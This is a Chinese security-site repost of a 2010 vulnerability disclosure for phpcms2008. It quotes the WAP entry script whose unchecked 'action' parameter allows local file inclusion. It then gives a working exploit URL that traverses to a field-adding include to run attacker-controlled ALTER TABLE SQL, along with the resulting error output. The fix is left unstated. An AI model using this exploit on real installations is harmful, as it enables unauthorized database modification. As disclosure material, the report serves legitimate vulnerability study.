首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
phpcms2008本地文件包括及利用(执行任意SQL脚本)
来源:http://www.wooyun.org 作者:Jannock 发布时间:2010-10-12  

漏洞详情

简要描述:

phpcms2008本地文件包括及利用(执行任意SQL脚本)

详细说明:

文件wap/index.php
<?php
include '../include/common.inc.php';
include './include/global.func.php';
$lang = include './include/lang.inc.php';
if(preg_match('/(mozilla|m3gate|winwap|openwave)/i', $_SERVER['HTTP_USER_AGENT']))
{
header('location:../');
}
wmlHeader($PHPCMS['sitename']);

$action = isset($action) && !empty($action) ? $action : 'index';
if($action)
{
include './include/'.$action.'.inc.php';
}

$html = CHARSET != 'utf-8' ? iconv(CHARSET, 'utf-8', $html) : $html;
echo str_replace('<br/>', "<br/>\n", $html);
wmlFooter();
?>


action 变量没有判断,造成本地文件包含漏洞。

利用(其中之一):

包含目录include\fields\areaid 下任一文件,即可执行任意SQL脚本。

如:field_add.inc.php
<?php
if(!$maxlength) $maxlength = 255;
$maxlength = min($maxlength, 255);
$sql = "ALTER TABLE `$tablename` ADD `$field` VARCHAR( $maxlength ) NOT NULL DEFAULT '$defaultvalue'";
$db->query($sql);
?>
tablename 等变量可以直接传入。 当然,这个访问需要用Opera等浏览器访问。

漏洞证明:

用Opera浏览器访问

http://www.phpcms.cn/wap/index.php?action=../../include/fields/areaid/field_add&tablename=xx

6: </head>
7: <card id="phpcmsWml" title="Phpcms">
8: <p>
9: <div style="font-size:12px;text-align:left; border:1px solid #9cc9e0; padding:1px 4px;color:#000000;font-family:Arial, Helvetica,sans-serif;"><span><b>MySQL Query : </b>ALTER TABLE `xx` ADD `` VARCHAR( 255 ) NOT NULL DEFAULT '' <br /><b> MySQL Error : </b>Table 'phpcms.xx' doesn't exist <br /> <b>MySQL Errno : </b>1146 <br /><b> Message : </b> MySQL Query Error</span></div>

修复方案:

都知道。


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·shopxp html版2.0管理员添加漏洞
·Phpwind 注入以及利用之二:文件
·Discuz非创始人管理员代码执行
·Discuz! 7.1 & 7.2 后台远程代码
·ewebeditor高版本>=5.5鸡肋0day
·无忧购物系统ASP时尚版和通用版
·162100网址导航1.9本地文件包含
·PhpYun人才系统通杀注入及代码执
·Discuz! 7.2以下版本及各uc产品a
·N点虚拟主机管理系统 致命漏洞。
·慧博商城系统V6.0注入漏洞
·万博网站管理系统(NWEB)通杀漏洞
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved